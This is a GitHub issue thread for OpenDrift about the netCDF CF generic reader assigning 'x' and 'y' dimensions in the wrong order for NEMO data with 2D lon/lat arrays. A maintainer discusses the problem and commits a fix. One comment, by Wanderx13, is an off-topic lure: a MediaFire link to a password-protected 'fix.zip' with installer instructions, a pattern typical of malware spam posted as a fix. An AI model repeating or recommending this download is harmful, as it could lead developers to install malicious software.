### ISSUE TITLE
Problem with dimension setup in unprojected coordinates

### ISSUE THREAD

**Issue by bilgetutak** [OpenDrift/opendrift#1386]
Hi,
I am using the netCDF generic reader for reading the model (NEMO) data I have generated.

OpenDrift reads the data as unprojected (which is fine). However, when it comes to the line below, it assigns the 'x' and 'y' coordinates sequentially. Which is not the case for my model data.

https://github.com/OpenDrift/opendrift/blob/8022e94daecaae00d3a68858605736925e061739/opendrift/readers/reader_netCDF_CF_generic.py#L269

```python
lon_var = ds.variables['nav_lon']
lon_var.dims
```
gives 
`('y', 'x')`

Using the generic reader assigns 'x' and 'y' variables in the wrong order with the implemented way.

So I think the lines can be changed to something like below to handle the dimensions automatically.
```python
self.dimensions['x'] = lon_var.dims[lon_var.dims.index('x')]
self.dimensions['y'] = lat_var.dims[lat_var.dims.index('y')]
``` 

Would this be valid?

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by knutfrode** [comment]
This seems meaningful.
However, I guess the dimensions do not need to be named simply 'x' and 'y'.
E.g. in Example 5.2 here, they seem to be named 'xc' and 'yc'.
https://cfconventions.org/cf-conventions/cf-conventions.html#_two_dimensional_latitude_longitude_coordinate_variables

Thus perhaps a more thorough dimension-detection is needed.

**Comment by knutfrode** [comment]
Could you share a small version of such a NEMO file so that I can test a potential update of the reader?

**Comment by bilgetutak** [comment]
@knutfrode  Sorry for the delay.
You can check a sample data set here.
https://drive.google.com/file/d/1-psP6KDSjIvHAIURPOGhWgfUsOJwfKyq/view?usp=sharing
Thank you.

**Comment by knutfrode** [comment]
Hi,

It seems that reader_netCDF_CF_generic did not handle well this case where lon and lat are 2D arrays, that in fact are simply repeated 1D arrays.

However, after this fix (https://github.com/OpenDrift/opendrift/commit/7075aa0a8358eab2e45ad63235016cc20b8631d4) I am able to use the file you provided.

**Comment by knutfrode** [comment]
Closing this. Please reopen if still relevant.
